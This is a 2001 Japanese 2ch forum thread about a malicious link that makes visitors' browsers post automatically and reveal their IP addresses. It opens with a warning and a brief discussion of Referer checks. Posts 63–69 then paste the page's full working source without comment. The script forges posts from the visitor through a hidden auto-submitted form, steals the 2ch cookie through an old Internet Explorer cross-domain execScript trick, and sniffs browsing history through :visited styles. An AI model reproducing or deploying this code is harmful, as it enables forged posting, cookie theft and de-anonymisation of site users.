またもや２ｃｈの危機です！！

1 ： ：01/12/17 18:01

ttp://ｗｗｗ2j.biglobe.ne.jp/~tatuta/cgi-bin/paint/20.gif
「末尾の数字はいろいろ」
このリンクをブラウザから踏むとＩＰを抜かれ自動的にスレをたてて
しまうので興味本位でおさないようにしましょう。
今のところ半角、厨房、で被害拡大中
------------------------------
ソースhttp://choco.2ch.net/test/read.cgi/news/1008577522/l50

57 ：jjj ：01/12/18 00:21

うーん。
意味無いとおもうんだけど。
リファラって自由に設定できそうなんだけど、間違ってます？

58 ：名無しさん＠お腹いっぱい。 ：01/12/18 00:24

間違ってます。てかもうかなり沈静化した模様。

59 ：28 ：01/12/18 00:31

>>57
Referer自体は偽造できそうだけど、広く出回っているブラウザ上で偽造してリクエストを送ることが出来ない
ので今回のような事態を回避できるんじゃないかと思うんですが。
2chアタック用の特製ブラウザやボット相手には通じないけど、そういうのには既に別の対策がしてあるんじゃ
ないかな？

60 ：名無しさん＠お腹いっぱい。 ：01/12/18 00:44

ほ、放置なのか・・・＜ML

61 ：名無しさん＠お腹いっぱい。 ：01/12/18 01:27

母体を仕掛ける先が明らかだから、ワームとしては運用しにくいと思われ。
まあそのへんのマシンを踏み台に使えばいいんだけど（藁

62 ：1 ：01/12/18 16:33

このスレは多分終了しました。
ご協力ありがとうございました。

63 ：名無しさん＠お腹いっぱい。 ：01/12/21 22:59

<!DOCTYPE>
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
</HEAD>
<BODY>
<!--[if lt IE 5.5000]>
<noscript><IMG src="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.pn
g"></noscript>
<![endif]-->
<!--[if IE]>
<IMG src2="http://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h6901.png" id=img
1 style=display:none>
<span id=span1 style=display:none></span>
<iframe id=ic1 src=about:blank style=display:none></iframe>
<iframe id=if1 src=about:blank style=display:none></iframe>
<form id=f1 method=POST style=display:none>
<input type=submit name=submit>
<input name=subject>
<input name=FROM>
<input name=mail>
<textarea name=MESSAGE></textarea>
<input name=bbs>

64 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:00

<input name=key>
<input name=time>
</form>
<script id=scr1 for=window event=onload>

var NAME='';
var TAR='';

function main1(){
NAME=parent.NAME;
var t1=TAR.split('/');
var dom=t1[0];
var bbs='';
var key='';
if(t1[1]=='test'){
bbs=t1[3];
key=t1[4];
}else{
bbs=t1[1];
key=searchKey(dom,bbs,3600);
}
if(key){
f1.action='http://'+dom+'/test/bbs.cgi';

65 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:01

f1.key.value=key;
}else{
f1.action='http://'+dom+'/test/subbbs.cgi';
f1.subject.value='Ｗｅｌｃｏｍｅ ｔｏ 裏２ちゃんねる！';
}
var ura2=false;

if((!NAME)&&(Math.random()>0.5)){ura2=true;}
if(NAME){
f1.FROM.value='fusianasan '+NAME;
}else if(ura2){
f1.FROM.value='http://www.fusianasan.2ch.net/';
}else{
f1.FROM.value='fusianasan';
}
if(NAME){
f1.mail.value=NAME.replace(/\#/g,'$');
}else if(ura2){
f1.mail.value='ura2ch go!';
}else{
f1.mail.value='';
}
if(ura2){

66 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:01

f1.MESSAGE.value='guest guest\nＷｅｌｃｏｍｅ ｔｏ 裏２ちゃんねる！\n'+p
arent.location.href;
}else{
f1.MESSAGE.value=parent.location.href;
}
f1.bbs.value=bbs;
f1.time.value=String(Math.floor(new Date().getTime()/1000));
parent.setTimeout("if1.location.replace('about:blank')",5000);
parent.img1.src=parent.img1.src2;
parent.img1.style.display='block';
f1.submit.click();
}

function main(){
var t1=location.search;
if(t1){
t1=t1.substr(1);
TAR=t1;
main1();
return;
}
t1=document.referrer;
if(!t1){

67 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:01

t1='http://tmp.2ch.net/kitchen/';
}
if(!t1){
img1.src=img1.src2;
img1.style.display='block';
return;
}
t1=t1.substr(7);
var t2=t1.indexOf('#');
if(t2>=0){t1=t1.substr(0,t2);}
var t3='';
var t2=t1.indexOf('/');
if(t2>=0){t3=t1.substr(0,t2);}
queryCookie(t3);
if1.location.replace(location.href+'?'+t1);
}

main();

function queryCookie(s){
var t1='about://'+s+'/\n';
t1+='<script id=scr1 for=window event=onload>';
t1+='try{parent.catchCookie(document.cookie)}catch(e){}';

68 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:02

t1+='<\/script><noscript><xml:namespace prefix=t /><?import namespace=t implemen
tation=#default#time2 /><t:set id=set1 to=\'\' attributeName=document.parentWind
ow.execScript(scr1.innerHTML),set1.outerHTML /></noscript>';
ic1.location.replace(t1);
}

function catchCookie(s){
NAME=recognizeCookie(s,'NAME');
}

function recognizeCookie(s,k){
var t=s.split('; ');
for(var i=0;i<t.length;i++){var r=t[i].split('=');if(r[0]==k){return unescape(r[
1])}}
return '';
}

function searchKey(dom,bbs,len){
var t1=Math.floor(new Date().getTime()/1000);
var t2=t1-len;
var t3='http://'+dom+'/test/read.cgi/'+bbs+'/';
for(var i=t1;i>t2;i--){
var a1=document.createElement('A');

69 ：名無しさん＠お腹いっぱい。 ：01/12/21 23:02

a1.href=t3+String(i)+'/l50';
span1.appendChild(a1);
if(a1.currentStyle.visited=='1'){
return String(i);
}
}
return '';
}

</script>
<noscript>
<xml:namespace prefix=t />
<?import namespace=t implementation=#default#time2 />
<t:set id=set1 to='' attributeName=document.parentWindow.execScript(scr1.innerHT
ML),set1.outerHTML />
</noscript>
<![endif]-->
</BODY>
</HTML>

70 ：名無しさん＠お腹いっぱい。 ：02/02/27 23:16

もりあがり期待あげ

71 ：名無しさん＠お腹いっぱい。 ：02/03/04 21:11

まつりだまつりだ

72 ：名無しさん＠お腹いっぱい。 ：02/03/09 14:33

73 ：名無しさん＠お腹いっぱい。 ：02/03/10 23:08

まつつつつｔ

74 ：名無しさん＠お腹いっぱい。 ：02/03/29 19:08

ききです。黄門も閉鎖された

75 ：名無しさん＠お腹いっぱい。 ：02/05/11 20:59

感動age

read.cgi ver5.26+ (01/10/21-)